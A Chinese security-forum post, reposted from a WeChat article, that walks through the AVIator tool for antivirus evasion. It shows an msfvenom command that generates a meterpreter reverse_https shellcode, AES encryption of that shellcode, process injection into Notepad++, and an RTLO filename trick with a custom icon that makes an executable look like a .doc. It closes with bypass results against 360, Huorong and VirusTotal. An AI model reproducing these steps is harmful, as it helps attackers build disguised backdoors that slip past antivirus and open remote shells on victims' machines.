安全矩阵

 找回密码
 立即注册
搜索
查看: 2693|回复: 0

远控免杀专题(14)-AVlator(VT免杀率25/69)

[复制链接]

12

主题

18

帖子

150

积分

注册会员

Rank: 2

积分
150
发表于 2020-3-8 11:39:41 | 显示全部楼层 |阅读模式
本帖最后由 braveX 于 2020-3-8 11:43 编辑

转载于https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q

免杀能力一览表




几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

一、AVlator介绍



AVIator使用AES加密来加密Shellcode,生成一个包含加密有效负载的可执行文件,然后使用各种注入技术将shellcode解密并注入到目标系统,从而绕过杀毒软件的检测。


二、安装AVlator



AVIator只有windows版,c#开发,单文件exe。
安装也非常方便,直接从github上下载下来。

  1. git clone https://github.com/Ch0pin/AVIator
复制代码
或者直接下载压缩包
https://github.com/Ch0pin/AVIator/archive/master.zip
解压后在Compiled Binaries文件夹中有x86和x64的可执行exe文件,执行即可



使用也非常简单,只需要填入payload后简单设置一下就可以。


三、AVlator生成后门



首先要使用msf生成shellceode,需要基于c#,我就用msf生成一个最基础的
  1. msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333  -f csharp -o test11.c
复制代码



在AVIator中对shellcode进行处理,AES KEY和IV默认就可以
payload地方填入上面生成的test11.c文件内容,然后点击Encrypt,生成加密后的payload。



目标操作系统架构根据实际情况选择就可以,x86比较通用一些。
下面还有个Injection Techniques,需要选择注入技术,我这选择第二个注入Notepad++进程


另外,软件还提供了RTLO选项,可以使可执行文件名看起来伪装性更好。比如,启用该选项后,文件testcod.exe将被保存文件名为testexe.doc,但文件还是可以正常被当做exe执行的。但是,选择了RTLO选项虽然更迷惑人,但也更容易被杀软报警告。
还可以自定义程序ico图标,增强伪装,我这就不配置了。



点击generate后就可以生成后门程序了。



不开杀软的时候可正常上线



打开杀软进行测试,可过360和火绒动静态检测



比较诡异的是360安全卫士的行为检测发现木马行为





但火绒和360杀毒没点反应,可正常上线



virustotal.com中30/69个报毒



后来我没启用RTLO选项又生成了一个正常的exe文件,看来RTLO选项影响还挺大。
virustotal.com中25/69个报毒



四、小结



参考
官方说明文档:https://github.com/Ch0pin/AVIator









































本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:51 , Processed in 0.013410 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表